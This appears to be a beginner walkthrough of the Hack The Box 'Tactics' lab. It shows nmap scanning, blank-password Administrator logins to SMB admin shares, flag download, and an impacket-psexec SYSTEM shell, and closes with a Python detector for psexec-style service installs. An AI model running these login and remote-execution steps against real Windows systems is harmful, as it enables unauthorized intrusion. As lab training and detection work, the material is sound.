The aim of this walkthrough is to provide help with the Tactics machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 1 challenges.

SETUP

There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $ echo $rhost 
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

We could use the unset command to remove it after we no longer need it.

┌─[][htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $unset rhost 
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

TASK 1

Question: Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?

We start out with a quick connection test.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ ping $rhost -c 4
PING 10.129.118.218 (10.129.118.218) 56(84) bytes of data.
64 bytes from 10.129.118.218: icmp_seq=1 ttl=127 time=10.8 ms
64 bytes from 10.129.118.218: icmp_seq=2 ttl=127 time=10.4 ms
64 bytes from 10.129.118.218: icmp_seq=3 ttl=127 time=10.8 ms
64 bytes from 10.129.118.218: icmp_seq=4 ttl=127 time=10.6 ms

--- 10.129.118.218 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 10.392/10.645/10.836/0.174 ms
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

Running nmap without any options does not work, but it does in fact give us a hint.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ nmap $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:18 BST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

So let’s try it.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ nmap -Pn $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:21 BST
Nmap scan report for 10.129.118.218
Host is up (0.013s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.28 seconds
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

Three (top) ports appear to be open: 135, 139 and 445.

Let’s check these reported services for some more information.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ nmap -p135,139,445 -Pn -sC -sV $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:38 BST
Nmap scan report for 10.129.118.218
Host is up (0.012s latency).

PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-05-10T21:38:14
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.52 seconds
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

-Pn

TASK 2

Question: What does the 3-letter acronym SMB stand for?

A quick online search can do wonders…

server message block

TASK 3

Question: What port does SMB use to operate at?

Online research, just like in the previous task.

445

TASK 4

Question: What command line argument do you give to `smbclient` to list available shares?

Using the command’s built-in help option should give us a hand here.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ smbclient --help
Usage: smbclient [OPTIONS] service <password>
...
  -L, --list=HOST                              Get a list of shares available on a host
...

Trying out the default Administrator account and hoping that it is misconfigured (without any password) does not disappoint.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ smbclient -L $rhost -U Administrator
Password for [WORKGROUP\Administrator]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ 

Three shares are listed on our target machine.

-L

TASK 5

Question: What character at the end of a share name indicates it's an administrative share?

Looking at the reported shares from TASK4, it must be $. But let’s try and access the shares:

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ smbclient //$rhost/ADMIN$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Sep 20 17:02:48 2021
  ..                                  D        0  Mon Sep 20 17:02:48 2021
  $Reconfig$                          D        0  Mon Sep 20 17:02:49 2021
  ADFS                                D        0  Sat Sep 15 08:19:03 2018
  appcompat                           D        0  Sat Sep 15 08:19:00 2018
  apppatch                            D        0  Mon Oct 29 22:39:47 2018
  AppReadiness                        D        0  Wed Apr 21 16:39:36 2021
  assembly                           DR        0  Sat Sep 15 10:09:13 2018
  bcastdvr                            D        0  Sat Sep 15 08:19:00 2018
  bfsvc.exe                           A    78848  Sat Sep 15 08:12:58 2018
  Boot                                D        0  Sat Sep 15 08:19:01 2018
  bootstat.dat                       AS    67584  Wed May 10 22:15:58 2023
  Branding                            D        0  Sat Sep 15 08:19:01 2018
  CbsTemp                             D        0  Wed Jul  7 19:00:03 2021
  Containers                          D        0  Sat Sep 15 08:19:01 2018
  Cursors                             D        0  Sat Sep 15 08:19:04 2018
  debug                               D        0  Wed Apr 21 16:17:15 2021
  diagnostics                         D        0  Sat Sep 15 08:19:01 2018
  DigitalLocker                       D        0  Sat Sep 15 10:05:40 2018
  Downloaded Program Files           DS        0  Sat Sep 15 08:19:04 2018
  drivers                             D        0  Sat Sep 15 08:19:01 2018
  DtcInstall.log                      A     1947  Wed Apr 21 16:16:44 2021
  ELAMBKUP                           DH        0  Sat Sep 15 08:19:04 2018
  en-US                               D        0  Sat Sep 15 10:05:40 2018
  explorer.exe                        A  4245280  Mon Oct 29 22:39:24 2018
  Fonts                             DSR        0  Sat Sep 15 08:19:04 2018
  Globalization                       D        0  Sat Sep 15 08:19:01 2018
  Help                                D        0  Sat Sep 15 10:05:40 2018
  HelpPane.exe                        A  1065472  Sat Sep 15 08:12:46 2018
  hh.exe                              A    18432  Sat Sep 15 08:12:48 2018
  IdentityCRL                         D        0  Sat Sep 15 08:19:04 2018
  IME                                 D        0  Sat Sep 15 10:05:40 2018
  ImmersiveControlPanel              DR        0  Wed Apr 21 16:16:42 2021
  INF                                 D        0  Wed May 10 22:09:44 2023
  InputMethod                         D        0  Sat Sep 15 08:19:01 2018
  Installer                         DHS        0  Wed Jul  7 19:05:00 2021
  L2Schemas                           D        0  Sat Sep 15 08:19:04 2018
  LiveKernelReports                   D        0  Sat Sep 15 08:19:01 2018
  Logs                                D        0  Tue Sep 21 17:33:25 2021
  lsasetup.log                        A     1380  Wed Apr 21 16:16:02 2021
  media                             DSR        0  Sat Sep 15 08:19:04 2018
  mib.bin                             A    43131  Sat Sep 15 08:12:40 2018
  Microsoft.NET                      DR        0  Wed May 10 22:15:59 2023
  Migration                           D        0  Sat Sep 15 08:19:01 2018
  ModemLogs                           D        0  Sat Sep 15 08:19:01 2018
  notepad.exe                         A   254464  Sat Sep 15 08:12:38 2018
  OCR                                 D        0  Sat Sep 15 10:07:04 2018
  Offline Web Pages                  DR        0  Sat Sep 15 08:19:05 2018
  Panther                             D        0  Wed Apr 21 16:16:50 2021
  Performance                         D        0  Sat Sep 15 08:19:01 2018
  PFRO.log                            A     1708  Mon Sep 27 11:26:45 2021
  PLA                                 D        0  Sat Sep 15 08:19:01 2018
  PolicyDefinitions                   D        0  Sat Sep 15 10:08:05 2018
  Prefetch                           Dn        0  Wed Apr 21 16:16:20 2021
  PrintDialog                        DR        0  Wed Apr 21 16:16:43 2021
  Provisioning                        D        0  Sat Sep 15 08:19:01 2018
  regedit.exe                         A   358400  Sat Sep 15 08:12:52 2018
  Registration                        D        0  Wed May 10 22:05:37 2023
  RemotePackages                      D        0  Sat Sep 15 08:19:01 2018
  rescache                            D        0  Sat Sep 15 08:19:01 2018
  Resources                           D        0  Sat Sep 15 08:19:01 2018
  SchCache                            D        0  Sat Sep 15 08:19:01 2018
  schemas                             D        0  Sat Sep 15 08:19:01 2018
  security                            D        0  Sat Sep 15 08:19:01 2018
  ServerStandard.xml                  A    30931  Sat Sep 15 08:13:27 2018
  ServiceProfiles                     D        0  Wed Apr 21 16:16:04 2021
  ServiceState                        D        0  Sat Sep 15 08:19:01 2018
  servicing                           D        0  Sat Sep 15 10:06:36 2018
  Setup                               D        0  Sat Sep 15 08:21:38 2018
  ShellComponents                     D        0  Sat Sep 15 08:19:05 2018
  ShellExperiences                    D        0  Sat Sep 15 08:19:05 2018
  SKB                                 D        0  Sat Sep 15 08:19:01 2018
  SoftwareDistribution                D        0  Wed Apr 21 16:23:54 2021
  Speech                              D        0  Sat Sep 15 08:19:01 2018
  Speech_OneCore                      D        0  Sat Sep 15 08:19:01 2018
  splwow64.exe                        A   132096  Sat Sep 15 08:13:30 2018
  System                              D        0  Sat Sep 15 08:19:01 2018
  system.ini                          A      219  Sat Sep 15 08:16:48 2018
  System32                            D        0  Wed May 10 22:09:44 2023
  SystemApps                          D        0  Sat Sep 15 08:19:01 2018
  SystemResources                     D        0  Sat Sep 15 08:19:01 2018
  SysWOW64                            D        0  Wed Jul  7 19:04:43 2021
  TAPI                                D        0  Tue Sep 21 17:51:49 2021
  Tasks                               D        0  Wed Apr 21 16:16:18 2021
  Temp                                D        0  Wed May 10 22:16:17 2023
  TextInput                           D        0  Sat Sep 15 08:19:14 2018
  tracing                             D        0  Sat Sep 15 08:19:01 2018
  twain_32                            D        0  Sat Sep 15 08:19:14 2018
  twain_32.dll                        A    64512  Sat Sep 15 08:13:11 2018
  Vss                                 D        0  Sat Sep 15 08:19:01 2018
  WaaS                                D        0  Sat Sep 15 08:19:01 2018
  Web                                 D        0  Sat Sep 15 08:19:01 2018
  win.ini                             A       92  Sat Sep 15 08:16:48 2018
  WindowsShell.Manifest             AHR      670  Sat Sep 15 08:12:40 2018
  WindowsUpdate.log                   A      276  Wed May 10 22:05:41 2023
  winhlp32.exe                        A    11776  Sat Sep 15 08:13:11 2018
  WinSxS                              D        0  Wed Jul  7 18:46:29 2021
  WMSysPr9.prx                        A   316640  Sat Sep 15 08:12:02 2018
  write.exe                           A    11264  Sat Sep 15 08:12:55 2018

		3774463 blocks of size 4096. 1156502 blocks available
smb: \> pwd
Current directory is \\10.129.118.218\ADMIN$\
smb: \> exit
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

It looks like the ADMIN$ share contains the Windows system files. How about the other two?

We get lucky once we look around the C$ share: the final flag is located at \\$rhost\C$\Users\Administrator\Desktop\flag.txt, so we download it to our local machine.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ smbclient //$rhost/C$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Wed Apr 21 16:23:49 2021
  Config.Msi                        DHS        0  Wed Jul  7 19:04:56 2021
  Documents and Settings          DHSrn        0  Wed Apr 21 16:17:12 2021
  pagefile.sys                      AHS 738197504  Wed May 10 22:05:32 2023
  PerfLogs                            D        0  Sat Sep 15 08:19:00 2018
  Program Files                      DR        0  Wed Jul  7 19:04:24 2021
  Program Files (x86)                 D        0  Wed Jul  7 19:03:38 2021
  ProgramData                        DH        0  Tue Sep 13 17:27:53 2022
  Recovery                         DHSn        0  Wed Apr 21 16:17:15 2021
  System Volume Information         DHS        0  Wed Apr 21 16:34:04 2021
  Users                              DR        0  Wed Apr 21 16:23:18 2021
  Windows                             D        0  Wed Jul  7 19:05:23 2021

		3774463 blocks of size 4096. 1156502 blocks available
smb: \> cd Users
smb: \Users\> ls
  .                                  DR        0  Wed Apr 21 16:23:18 2021
  ..                                 DR        0  Wed Apr 21 16:23:18 2021
  Administrator                       D        0  Wed Apr 21 16:23:32 2021
  All Users                       DHSrn        0  Sat Sep 15 08:28:48 2018
  Default                           DHR        0  Wed Apr 21 16:17:12 2021
  Default User                    DHSrn        0  Sat Sep 15 08:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 08:16:48 2018
  Public                             DR        0  Wed Apr 21 16:23:31 2021

		3774463 blocks of size 4096. 1156502 blocks available
smb: \Users\> cd Administrator
smb: \Users\Administrator\> ls
  .                                   D        0  Wed Apr 21 16:23:32 2021
  ..                                  D        0  Wed Apr 21 16:23:32 2021
  3D Objects                         DR        0  Wed Apr 21 16:23:31 2021
  AppData                            DH        0  Wed Apr 21 16:23:19 2021
  Application Data                DHSrn        0  Wed Apr 21 16:23:19 2021
  Contacts                           DR        0  Wed Apr 21 16:23:31 2021
  Cookies                         DHSrn        0  Wed Apr 21 16:23:19 2021
  Desktop                            DR        0  Thu Apr 22 08:16:03 2021
  Documents                          DR        0  Wed Apr 21 16:23:32 2021
  Downloads                          DR        0  Wed Jul  7 18:44:36 2021
  Favorites                          DR        0  Wed Apr 21 16:23:31 2021
  Links                              DR        0  Wed Apr 21 16:23:32 2021
  Local Settings                  DHSrn        0  Wed Apr 21 16:23:19 2021
  Music                              DR        0  Wed Apr 21 16:23:32 2021
  My Documents                    DHSrn        0  Wed Apr 21 16:23:19 2021
  NetHood                         DHSrn        0  Wed Apr 21 16:23:19 2021
  NTUSER.DAT                        AHn   786432  Tue Sep 13 17:29:05 2022
  ntuser.dat.LOG1                   AHS    65536  Wed Apr 21 16:23:18 2021
  ntuser.dat.LOG2                   AHS   238592  Wed Apr 21 16:23:18 2021
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf    AHS    65536  Wed Apr 21 10:03:39 2021
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Wed Apr 21 16:23:19 2021
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Wed Apr 21 16:23:19 2021
  ntuser.ini                         HS       20  Wed Apr 21 16:23:19 2021
  Pictures                           DR        0  Wed Apr 21 16:23:31 2021
  PrintHood                       DHSrn        0  Wed Apr 21 16:23:19 2021
  Recent                          DHSrn        0  Wed Apr 21 16:23:19 2021
  Saved Games                        DR        0  Wed Apr 21 16:23:32 2021
  Searches                           DR        0  Wed Apr 21 16:23:32 2021
  SendTo                          DHSrn        0  Wed Apr 21 16:23:19 2021
  Start Menu                      DHSrn        0  Wed Apr 21 16:23:19 2021
  Templates                       DHSrn        0  Wed Apr 21 16:23:19 2021
  Videos                             DR        0  Wed Apr 21 16:23:31 2021

		3774463 blocks of size 4096. 1156502 blocks available
smb: \Users\Administrator\> cd Desktop
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Thu Apr 22 08:16:03 2021
  ..                                 DR        0  Thu Apr 22 08:16:03 2021
  desktop.ini                       AHS      282  Wed Apr 21 16:23:32 2021
  flag.txt                            A       32  Fri Apr 23 10:39:00 2021

		3774463 blocks of size 4096. 1156502 blocks available             
smb: \Users\Administrator\Desktop\> pwd
Current directory is \\10.129.118.218\C$\Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> get flag.txt
getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> exit
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

$

TASK 6

Question: Which Administrative share is accessible on the box that allows users to view the whole file system?

The answer should be quite simple since we used the same exact share in TASK5 to download our flag file.

C$

TASK 7

Question: What command can we use to download the files we find on the SMB Share?

Again, we used the same command to download the flag file in TASK5.

get

TASK 8

Question: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?

Optionally, we could use impacket's psexec tool to spawn a shell through the writable ADMIN$ share. Accessing the flag once we have located it then becomes quite simple.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ impacket-psexec administrator@$rhost
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

Password:
[*] Requesting shares on 10.129.118.218.....
[*] Found writable share ADMIN$
[*] Uploading file qbvrkWIQ.exe
[*] Opening SVCManager on 10.129.118.218.....
[*] Creating service UNVK on 10.129.118.218.....
[*] Starting service UNVK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd ..

C:\Windows>cd \Users\ 

C:\Users>cd Administrator

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is EEE0-FCDB

 Directory of C:\Users\Administrator\Desktop

04/22/2021  12:16 AM    <DIR>          .
04/22/2021  12:16 AM    <DIR>          ..
04/23/2021  02:39 AM                32 flag.txt
               1 File(s)             32 bytes
               2 Dir(s)   4,736,704,512 bytes free

C:\Users\Administrator\Desktop>type flag.txt
<flag>
C:\Users\Administrator\Desktop>

psexec.py
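
From the defender's side, the psexec run above leaves a recognisable trail: an executable written to ADMIN$, then a new service that runs it. The added example below (not part of the original walkthrough or of Impacket) correlates the two over constructed log records; the record layout, the %systemroot% image path, the 60-second window and the second IP address are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records, not captured from the target. Field names follow
# Windows events 5145 (file share access) and 7045 (service installed); the
# flat-dict export format and the timestamps are assumptions.
EVENTS = [
    {"time": "2023-05-10T21:50:01", "id": 5145, "ShareName": r"\\*\ADMIN$",
     "RelativeTargetName": "qbvrkWIQ.exe", "IpAddress": "10.10.14.46",
     "SubjectUserName": "Administrator"},
    {"time": "2023-05-10T21:50:02", "id": 7045, "ServiceName": "UNVK",
     "ImagePath": r"%systemroot%\qbvrkWIQ.exe"},
    # Benign: agent installed from Program Files, no preceding share write.
    {"time": "2023-05-10T22:10:00", "id": 7045, "ServiceName": "BackupAgent",
     "ImagePath": r"C:\Program Files\Backup\agent.exe"},
    # Benign: a log file touched on ADMIN$ that never becomes a service.
    {"time": "2023-05-10T22:15:00", "id": 5145, "ShareName": r"\\*\ADMIN$",
     "RelativeTargetName": "WindowsUpdate.log", "IpAddress": "10.10.14.7",
     "SubjectUserName": "helpdesk"},
]

# Service binary sitting directly in the Windows directory (what ADMIN$ maps to).
ROOT_EXE = re.compile(r"^(?:%systemroot%|[A-Za-z]:\\Windows)\\([^\\]+\.exe)$", re.I)
WINDOW = timedelta(seconds=60)  # assumed correlation window


def find_remote_service_installs(events):
    """Alert when an .exe written to ADMIN$ is installed as a service soon after."""
    uploads, alerts = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5145 and ev["ShareName"].upper().endswith("ADMIN$"):
            name = ev["RelativeTargetName"]
            if name.lower().endswith(".exe"):
                uploads.append((ts, name.lower(), ev["IpAddress"], ev["SubjectUserName"]))
        elif ev["id"] == 7045:
            match = ROOT_EXE.match(ev["ImagePath"].strip('"'))
            if not match:
                continue
            for up_ts, up_name, ip, user in uploads:
                if up_name == match.group(1).lower() and timedelta(0) <= ts - up_ts <= WINDOW:
                    alerts.append({
                        "service": ev["ServiceName"],
                        "binary": match.group(1),
                        "source_ip": ip,
                        "user": user,
                        # Short all-letter names like UNVK add weight to the alert.
                        "random_looking": bool(re.fullmatch(r"[A-Za-z]{4}", ev["ServiceName"])),
                    })
    return alerts


if __name__ == "__main__":
    for alert in find_remote_service_installs(EVENTS):
        print(alert)
```

Only the upload and service pair is reported; the Program Files service and the log file access on ADMIN$ are ignored.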

SUBMIT FLAG

Question: Submit root flag

Simply grabbing the downloaded flag file from TASK5 should do it.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$ cat flag.txt 
<flag>
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-luovj0ahiq][~]
└──╼ []$

Optionally, we could use impacket's psexec tool as we did in TASK8.

flag

Congratulations, we just successfully pwned the target machine. All we have left to do now is to terminate the target box (if not terminated automatically) before we continue with the next box!